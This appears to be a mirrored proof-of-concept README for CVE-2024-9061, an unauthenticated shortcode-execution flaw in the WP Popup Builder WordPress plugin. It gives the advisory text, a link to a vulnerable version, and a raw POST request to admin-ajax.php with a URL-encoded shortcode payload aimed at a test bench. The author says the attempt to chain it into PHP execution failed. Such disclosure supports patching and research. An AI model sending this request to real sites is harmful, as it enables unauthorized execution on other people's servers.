来源

关联漏洞

描述

WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Unauthenticated Arbitrary Shortcode Execution via wp_ajax_nopriv_shortcode_Api_Add

介绍

# CVE-2024-9061
WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Unauthenticated Arbitrary Shortcode Execution via wp_ajax_nopriv_shortcode_Api_Add

# Description

The The WP Popup Builder – Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. NOTE: This vulnerability was partially fixed in version 1.3.5 with a nonce check, which effectively prevented access to the affected function. However, version 1.3.6 incorporates the correct authorization check to prevent unauthorized access.

I had another plugin installed for php execution for this but never got it to execute.

[xyz-ips snippet="test"]

# Info

```
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)
```

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive

action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d
```

Response is a blank 200

文件快照

 [4.0K]  /data/pocs/042209fa54b391fa27db0b50aa8e4600db40dc77
└── [1.5K]  README.md

0 directories, 1 file

备注